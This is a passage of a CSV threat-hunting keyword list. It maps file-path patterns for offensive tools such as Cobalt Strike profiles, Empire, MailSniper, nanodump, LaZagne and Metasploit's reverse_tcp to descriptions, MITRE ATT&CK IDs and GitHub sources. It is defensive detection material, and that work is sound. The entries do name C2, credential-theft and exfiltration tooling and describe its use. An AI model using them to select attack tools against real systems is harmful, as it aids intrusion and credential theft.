use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*/MacroMeter*,offensive_tool_keyword,MacroMeter,VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript,T1027 - T1059 - T1564 - T1071,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/Cn33liz/MacroMeter,1,0,N/A,N/A,1,62,31,2018-04-23T09:14:49Z,2017-05-16T20:04:41Z -*/MacroPatterns.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/Macro-Payloads.py*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/MacroWord_Payload/macro.txt*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*/magnitude.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/MailRaider.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/MailRaider.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/MailSniper/*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*/main/cve-2022-0847.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/bbaranoff/CVE-2022-0847,1,1,N/A,N/A,1,49,25,2022-03-07T15:52:23Z,2022-03-07T15:50:18Z -*/main/exploit.js,offensive_tool_keyword,POC,Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hacksysteam/CVE-2023-21608,1,1,N/A,N/A,3,250,57,2023-02-27T04:51:20Z,2023-01-30T12:57:48Z -*/main/exploit.pdf,offensive_tool_keyword,POC,Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hacksysteam/CVE-2023-21608,1,1,N/A,N/A,3,250,57,2023-02-27T04:51:20Z,2023-01-30T12:57:48Z -*/MaliciousMacroMSBuild*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,1,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -*/malleable-c2*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*/MalSCCM.git*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*/MalSCCM.sln*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*/malseclogon.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*/MalStuff.cpp*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*/man_in_the_browser/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/man_in_the_browser/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/manage/exec_cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/Management/C2/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/manjusaka/plugins*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*/MANSPIDER.git*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,1,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/manspider_*.log*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/manspider_output*.txt,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/manspiderDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/master/GPSCoordinates/*,offensive_tool_keyword,GPSCoordinates,Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled,T1018 - T1059.001,TA0001 - TA0002,N/A,N/A,Reconnaissance,https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/master/JunctionFolder/*,offensive_tool_keyword,JunctionFolder,Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/master/PhantomService/*,offensive_tool_keyword,PhantomService,Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools,T1050.005 - T1055.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/maxdb-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mcafee-epo-agent.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/megatools.exe*,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*/membase-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/membase-http-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/memcached-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/memodipper64*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/memory_exec.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/memorydump.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,0,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*/mempodipper.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/MemReader_BoF/*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,1,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*/merlin.dll*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*/merlin.html*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*/merlin.js*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*/merlin.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*/merlin/agent_code/*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*/Metasploit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/metasploit/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/metasploit-framework/embedded/framework*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/metasploit-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/metasploit-msgrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/metasploit-xmlrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/metatwin.git*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*/meterpreter*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/meterpreter/reverse_tcp*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*/MFASweep.git*,offensive_tool_keyword,FMFASweep,A tool for checking if MFA is enabled on multiple Microsoft Services,T1595 - 